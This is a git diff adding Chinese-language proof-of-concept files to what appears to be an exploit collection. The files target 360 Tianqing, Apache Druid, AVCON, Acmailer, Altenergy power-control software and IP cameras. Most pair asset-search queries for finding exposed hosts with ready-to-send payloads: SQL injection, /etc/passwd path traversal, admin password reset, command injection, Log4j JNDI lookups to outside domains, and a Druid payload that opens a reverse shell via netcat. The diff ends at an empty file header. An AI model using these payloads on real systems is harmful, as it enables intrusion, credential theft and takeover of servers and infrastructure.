diff --git a/360-新天擎终端安全管理系统存在信息泄露漏洞.md b/360-新天擎终端安全管理系统存在信息泄露漏洞.md new file mode 100644 index 0000000..731ebba --- /dev/null +++ b/360-新天擎终端安全管理系统存在信息泄露漏洞.md @@ -0,0 +1,4 @@ +## 360 新天擎终端安全管理系统存在信息泄露漏洞 +``` +GET /runtime/admin_log_confcache +``` diff --git a/360天擎---未授权与sql注入.md b/360天擎---未授权与sql注入.md new file mode 100644 index 0000000..f642f2d --- /dev/null +++ b/360天擎---未授权与sql注入.md @@ -0,0 +1,26 @@ +## 360天擎 - 未授权与sql注入 + +## FOFA语法 +```title="360新天擎"``` + + +## 鹰图 +```web.title="360新天擎"&& ip.isp="教育"``` + +## 漏洞复现 + +### 未授权漏洞 +```路由后拼接/api/dbstat/gettablessize``` +![](./assets/20231018183944.png) + +### sql注入漏洞 +比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入 +``` +路由后拼接/api/dp/rptsvcsyncpoint?ccid=1 + +{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)-- +``` +![](./assets/20231018184057.png) + +## sqlmap +python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1 diff --git a/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md b/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md new file mode 100644 index 0000000..06fc669 --- /dev/null +++ b/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md 
@@ -0,0 +1,35 @@ +# 360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞 + +# 一、漏洞简介 +天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎getsimilarlist存在SQL注入漏洞,攻击者可通过此漏洞获取敏感信息。 + +# 二、影响版本 ++ 360天擎终端安全管理系统 + +# 三、资产测绘 ++ hunter`app.name=="天擎终端安全管理系统"` ++ 特征 + +![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/K-Fg9AeJYyC3cDpF/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-289858.png) + +# 四、漏洞复现 +响应中存在`qzbkq1qpzzq`表示可能存在漏洞 + +```plain +/api/client/getsimilarlist?status[0,1]=(CAST((CHR(113)||CHR(122)||CHR(98)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8327=8327) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC))&status[0]=1 +``` + +![1699415273715-cb428a2e-00fe-4bfd-ac82-8b24b00ae99e.png](./img/K-Fg9AeJYyC3cDpF/1699415273715-cb428a2e-00fe-4bfd-ac82-8b24b00ae99e-130863.png) + +sqlmap + +```plain +python3 sqlmap.py -u "https://xx.xx.xx.xx/api/client/getsimilarlist?status[0,1]=1&status[0]=1" --batch +``` + +![1699415337786-67a38012-b2b5-492d-a8da-5dd43f15f543.png](./img/K-Fg9AeJYyC3cDpF/1699415337786-67a38012-b2b5-492d-a8da-5dd43f15f543-099829.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md b/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md new file mode 100644 index 0000000..3f886cb --- /dev/null +++ b/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 360天擎终端安全管理系统loglastsync存在SQL注入漏洞 + +# 一、漏洞简介 +天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎loglastsync存在SQL注入漏洞,攻击者可通过此漏洞获取敏感信息。 + +# 二、影响版本 ++ 360天擎终端安全管理系统 + +# 三、资产测绘 ++ hunter`app.name=="天擎终端安全管理系统"` ++ 特征 + +![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/4AK_mPZiZs3AUv9h/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-052369.png) + +# 四、漏洞复现 +```plain +/api/dp/loglastsync?ccid=1') AND 9421=(SELECT 9421 FROM PG_SLEEP(5)) AND ('crvL'='crvL +``` + +![1701002054713-6bc9dfc4-e8cb-4675-9bfe-76902dc2cc03.png](./img/4AK_mPZiZs3AUv9h/1701002054713-6bc9dfc4-e8cb-4675-9bfe-76902dc2cc03-612883.png) + +sqlmap + +```plain +/api/dp/loglastsync?ccid=1 +``` + +![1701002087316-de0d5792-7b7c-4d76-b094-3b25d08c9ce5.png](./img/4AK_mPZiZs3AUv9h/1701002087316-de0d5792-7b7c-4d76-b094-3b25d08c9ce5-887312.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md b/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md new file mode 100644 index 0000000..009aab3 --- /dev/null +++ b/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md 
@@ -0,0 +1,43 @@ +# 360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞 + +# 一、漏洞简介 +天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎rptsvcsyncpoint存在SQL注入漏洞,攻击者可通过此漏洞获取敏感信息。 + +# 二、影响版本 ++ 360天擎终端安全管理系统 + +# 三、资产测绘 ++ hunter`app.name=="天擎终端安全管理系统"` ++ 特征 + +![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/qLEg5VoI2Ok1Dnar/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-979071.png) + +# 四、漏洞复现 +sqlmap + +```plain +python3 sqlmap.py -u "https://xx.xx.xx.xx/api/dp/rptsvcsyncpoint?ccid=1" --batch --skip-waf +``` + +![1699458415629-df2c5e1b-d4b0-445d-a456-bafb539988d5.png](./img/qLEg5VoI2Ok1Dnar/1699458415629-df2c5e1b-d4b0-445d-a456-bafb539988d5-034790.png) + +文件写入 + +```plain +/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('123456~');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\stc.txt';drop table O;-- +``` + +![1699458549014-42cd0a5a-b665-4a50-ad55-9d83aa571b4c.png](./img/qLEg5VoI2Ok1Dnar/1699458549014-42cd0a5a-b665-4a50-ad55-9d83aa571b4c-448311.png) + +写入文件位置 + +```plain +http://xx.xx.xx.xx/stc.txt +``` + +![1699458583924-6db94f8b-bbe7-4f84-b5b6-a44495337abb.png](./img/qLEg5VoI2Ok1Dnar/1699458583924-6db94f8b-bbe7-4f84-b5b6-a44495337abb-225246.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/360新天擎终端安全管理系统信息泄露漏洞.md b/360新天擎终端安全管理系统信息泄露漏洞.md new file mode 100644 index 0000000..813bc4f --- /dev/null +++ b/360新天擎终端安全管理系统信息泄露漏洞.md 
@@ -0,0 +1,25 @@ +# 360 新天擎终端安全管理系统信息泄露漏洞 + +# 一、漏洞简介 +天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;360 新天擎终端安全管理系统存在信息泄露漏洞。 + +# 二、影响版本 ++ 360 新天擎终端安全管理系统 + +# 三、资产测绘 ++ hunter`app.name=="天擎终端安全管理系统"` ++ 特征 + +![1698594701017-2b4351dd-e6bd-4f14-9d42-a6f7294a1fd3.png](./img/kTfByfQPYwCzZVhF/1698594701017-2b4351dd-e6bd-4f14-9d42-a6f7294a1fd3-945098.png) + +# 四、漏洞复现 +```plain +/runtime/admin_log_conf.cache +``` + +![1698594725622-ed1bf398-20e6-427c-b1c0-027f58968ea1.png](./img/kTfByfQPYwCzZVhF/1698594725622-ed1bf398-20e6-427c-b1c0-027f58968ea1-500252.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/ACTI-视频监控images存在任意文件读取漏洞.md b/ACTI-视频监控images存在任意文件读取漏洞.md new file mode 100644 index 0000000..0a115bb --- /dev/null +++ b/ACTI-视频监控images存在任意文件读取漏洞.md @@ -0,0 +1,30 @@ +# ACTI-视频监控images存在任意文件读取漏洞 + +### 一、漏洞描述 +ACTI-视频监控images存在任意文件读取漏洞 + +### 二、影响版本 +ACTI + +### 三、资产测绘 +```plain +app="ACTi-视频监控" +``` + +![1721626995048-5ecae669-a849-438f-831b-f8864a7825d4.png](./img/dVTu3UYBLPA-tSD6/1721626995048-5ecae669-a849-438f-831b-f8864a7825d4-107268.png) + +### 四、漏洞复现 +```plain +GET /images/../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![1721627029211-a5ec56ec-b9be-4969-a11a-e9788b489d8f.png](./img/dVTu3UYBLPA-tSD6/1721627029211-a5ec56ec-b9be-4969-a11a-e9788b489d8f-998871.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/AC集中管理平台未授权漏洞.md b/AC集中管理平台未授权漏洞.md new file mode 100644 index 0000000..2c08669 --- /dev/null +++ b/AC集中管理平台未授权漏洞.md 
@@ -0,0 +1,29 @@ +# AC集中管理平台未授权漏洞 + +多款AC集中管理平台、智能AC管理系统、智能路由系统(HTTPD-AC1.0服务)均被发现存在严重的未授权访问安全漏洞。此漏洞允许攻击者未经授权地直接访问多个data文件,进而非法获取包括AC用户名、密码、SSID(服务集标识符)、AP BSSID(接入点基站标识符)等在内的敏感及关键信息,对系统安全构成重大威胁。 + +## fofa + +```javascript +header="HTTPD_ac 1.0" +``` + +## poc + +```javascript +GET /actpt.data HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +``` + +![2564642ff99c1ab0e34d89aaf507ef65](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171614315.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/C7YKQlMtzWhC29M3F17CiQ \ No newline at end of file diff --git a/AVCON-系统管理平台download.action存在任意文件读取漏洞.md b/AVCON-系统管理平台download.action存在任意文件读取漏洞.md new file mode 100644 index 0000000..68861b1 --- /dev/null +++ b/AVCON-系统管理平台download.action存在任意文件读取漏洞.md @@ -0,0 +1,23 @@ +# AVCON-系统管理平台download.action存在任意文件读取漏洞 + +AVCON-系统管理平台download.action存在任意文件读取漏洞,通过该漏洞读取配置文件信息,造成信息泄露漏洞 + +## fofa + +```yaml +title="AVCON-系统管理平台" +``` + + +## poc + +```java +GET /download.action?filename=../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + diff --git a/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md b/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md new file mode 100644 index 0000000..d1d8ef7 --- /dev/null +++ b/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md 
@@ -0,0 +1,28 @@ +# AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞 + +AVCON-网络视频服务系统通过接口 `/avcon/av_user/editusercommit.php?currentpage=1` 重置admin用户的密码,从而登录系统后台。 + +## fofa + +```yaml +title=="avcon 网络视频会议系统" +``` + +## poc + +```java +POST /avcon/av_user/editusercommit.php?currentpage=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 226 +Connection: close +Upgrade-Insecure-Requests: 1 +Priority: u=4 + +userid=admin&username=administration&password=admin&rpassword=admin&question=admin&answer=123&gender=%E7%94%B7&birthday=0000-00-00&edutypeid=0&phone=&mobile=&email=&address=&postcode=&go=-2&confirm=+++%E7%A1%AE%E5%AE%9A+++ +``` + diff --git a/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md b/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md new file mode 100644 index 0000000..23e4454 --- /dev/null +++ b/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md 
@@ -0,0 +1,46 @@ +# Acmailer邮件系统init_ctl存在远程命令执行漏洞 + +# 一、漏洞简介 +Acmailer 是一款用于支持邮件服务的CGI软件。Acmailer邮件系统 init_ctl.cgi接口处远程命令执行,攻击者可通过此漏洞获取服务器权限。 + +# 二、影响版本 ++ Version≤Acmailer 4.0.2 + +# 三、资产测绘 ++ fofa`body="CGI acmailer"` ++ 特征 + +![1708963927312-b5ae3848-2277-44b8-b799-6ef34544756b.png](./img/WasJxdH_XZeC7KZp/1708963927312-b5ae3848-2277-44b8-b799-6ef34544756b-033862.png) + +# 四、漏洞复现 +```plain +POST /init_ctl.cgi HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 +Connection: close +Content-Length: 150 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +admin_name=u&admin_email=m@m.m&login_id=l&login_pass=l&sendmail_path=|id > 13619.txt | bash&homeurl=http://&mypath=e +``` + +![1708963961029-9e3fb68f-505d-474c-a060-38ff45f7e2db.png](./img/WasJxdH_XZeC7KZp/1708963961029-9e3fb68f-505d-474c-a060-38ff45f7e2db-076657.png) + +获取命令执行结果 + +```plain +GET /13619.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 +Connection: close +Cookie: sid=a6d9c99e3ae98d10ee34acc24af3f536 +Accept-Encoding: gzip, deflate +``` + +![1708963996773-62feb337-c501-4d6c-8e66-47953f68b34d.png](./img/WasJxdH_XZeC7KZp/1708963996773-62feb337-c501-4d6c-8e66-47953f68b34d-017278.png) + + + +> 更新: 2024-02-29 23:57:46 +> 原文: \ No newline at end of file diff --git a/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md new file mode 100644 index 0000000..24cabf4 --- /dev/null +++ b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md 
@@ -0,0 +1,29 @@ +# Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞 + +电力系统控制软件 Altenergy Power Control Software C1.2.5版本的系统/set_timezone接口存在命令注入漏洞,攻击者可执行任意命令获取服务器权限。 + +## fofa + +```yaml +title="Altenergy Power Control Software" +``` + +## poc + +```java +POST /index.php/management/set_timezone HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +timezone=`id > rce.txt` +``` + +![image-20240820204404636](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408202044765.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Zf5Jrr2pozEBVxBaV8BsgQ \ No newline at end of file diff --git a/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md b/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md new file mode 100644 index 0000000..d698470 --- /dev/null +++ b/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md 
@@ -0,0 +1,26 @@ +# Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞 + +Altenergy 电力系统控制软件中发现了一个被归类为严重漏洞。此漏洞影响文件 /index.php/display/status_zigbee 的 get_status_zigbee 函数。使用未知输入操纵参数 date 会导致 sql 注入漏洞。 + +## fofa + +```javascript +title="Altenergy Power Control Software" +``` + +## poc + +```javascript +POST /index.php/display/status_zigbee HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Connection: close + +date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)||CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,113),11-- wPIB +``` + +![image-20241122153242310](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221532381.png) \ No newline at end of file diff --git a/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md b/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md new file mode 100644 index 0000000..e3c0652 --- /dev/null +++ b/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md 
@@ -0,0 +1,32 @@ +# Amcrest IP Camera Web Sha1Account1账号密码泄漏漏洞 + +### 一、漏洞描述 +Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据。 + +### 二、影响版本 +Amcrest-IP-Camera-Web + +### 三、资产测绘 +```plain +"Amcrest" +``` + +![1721627251064-39b3ae91-5e59-4760-9155-86c277d8cf99.png](./img/8XlmibRRnPef1JSZ/1721627251064-39b3ae91-5e59-4760-9155-86c277d8cf99-615793.png) + +### 四、漏洞复现 +```plain +GET /current_config/Sha1Account1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![1721627347286-63be31c8-de32-4cfb-bfbb-75d44228384e.png](./img/8XlmibRRnPef1JSZ/1721627347286-63be31c8-de32-4cfb-bfbb-75d44228384e-589306.png) + +![1721627357667-e73bab23-0123-4255-b16f-0aae0e14ec30.png](./img/8XlmibRRnPef1JSZ/1721627357667-e73bab23-0123-4255-b16f-0aae0e14ec30-645933.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/ApaceDruid存在Log4j远程命令执行漏洞.md b/ApaceDruid存在Log4j远程命令执行漏洞.md new file mode 100644 index 0000000..9eb9752 --- /dev/null +++ b/ApaceDruid存在Log4j远程命令执行漏洞.md 
@@ -0,0 +1,30 @@ +# Apace Druid存在Log4j 远程命令执行漏洞 + +# 一、漏洞简介 +Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Log4j是Apache的一个开源项目,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于JNDI远程加载类的地址。Apache Druid 使用了该项目进行记录日志,攻击者通过构造恶意的代码即可利用该漏洞,从而导致服务器权限丢失 + +# 二、影响版本 ++ Apache Druid + +# 三、资产测绘 +```java +title="Apache Druid" +``` + +![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/x80mTfAxrWUUsm3N/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-632900.png) + +# 四、漏洞复现 +```java +GET /druid/coordinator/v1/lookups/config/${jndi:ldap://pvibhhxnwt.dgrh3.cn} HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 +Content-Length: 995 +Connection: close +``` + +![1718118782988-83dafd63-a369-410f-9799-f0866733f9f1.png](./img/x80mTfAxrWUUsm3N/1718118782988-83dafd63-a369-410f-9799-f0866733f9f1-055296.png) + + + +> 更新: 2024-06-17 09:22:47 +> 原文: \ No newline at end of file diff --git a/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md b/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md new file mode 100644 index 0000000..088d95b --- /dev/null +++ b/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md 
@@ -0,0 +1,31 @@ +# Apace Druid存在任意文件读取漏洞(CVE-2021-36749) + +# 一、漏洞简介 +Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Apace Druid存在任意文件读取漏洞 + +# 二、影响版本 ++ Apache Druid < 0.20.1 + +# 三、资产测绘 +```java +title="Apache Druid" +``` + +![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/zvg_dvGP6RhRXWMv/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-937404.png) + +# 四、漏洞复现 +```java +POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 +Host: +Content-Length: 478 +Content-Type: application/json;charset=UTF-8 + +{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} +``` + +![1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e.png](./img/zvg_dvGP6RhRXWMv/1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e-877497.png) + + + +> 更新: 2024-06-17 09:22:47 +> 原文: \ No newline at end of file diff --git a/ApaceDruid存在未授权漏洞.md b/ApaceDruid存在未授权漏洞.md new file mode 100644 index 0000000..c3142bc --- /dev/null +++ b/ApaceDruid存在未授权漏洞.md 
@@ -0,0 +1,24 @@ +# Apace Druid存在未授权漏洞 + +# 一、漏洞简介 +Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Apace Druid存在未授权漏洞 + +# 二、影响版本 ++ Apache Druid < 0.20.1 + +# 三、资产测绘 +```java +title="Apache Druid" +``` + +![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/BoWlew1AA2lJSFEI/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-039076.png) + +# 四、漏洞复现 +直接访问地址+端口 + +![1718117298072-1908926e-66e1-422f-87ef-2a43156cddbb.png](./img/BoWlew1AA2lJSFEI/1718117298072-1908926e-66e1-422f-87ef-2a43156cddbb-167640.png) + + + +> 更新: 2024-06-17 09:22:47 +> 原文: \ No newline at end of file diff --git a/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md b/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md new file mode 100644 index 0000000..4ec148a --- /dev/null +++ b/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md 
@@ -0,0 +1,52 @@ +# Apace Druid存在远程代码执行漏洞(CVE-2021-25646) + +# 一、漏洞简介 +Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Apace Druid存在远程代码执行漏洞(CVE-2021-25646) + +# 二、影响版本 ++ Apache Druid < 0.20.1 + +# 三、资产测绘 +```java +title="Apache Druid" +``` + +![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/eTVsJmumkOXRu6la/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-258372.png) + +# 四、漏洞复现 +```java +POST /druid/indexer/v1/sampler HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/json +Content-Length: 995 +Connection: close + + +{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping oujgprwnew.dgrh3.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}} +``` + 
+![1718117950461-ed2955b8-c697-4046-a13c-c7ff2a2cb8fd.png](./img/eTVsJmumkOXRu6la/1718117950461-ed2955b8-c697-4046-a13c-c7ff2a2cb8fd-758944.png) + +反弹shell + +```java +POST /druid/indexer/v1/sampler HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/json +Content-Length: 1008 +Connection: close + + +{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}} +``` + + + +> 更新: 2024-06-17 09:22:47 +> 原文: \ No newline at end of file diff --git a/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md b/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md new file mode 100644 index 0000000..b70cafb --- /dev/null +++ b/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md 
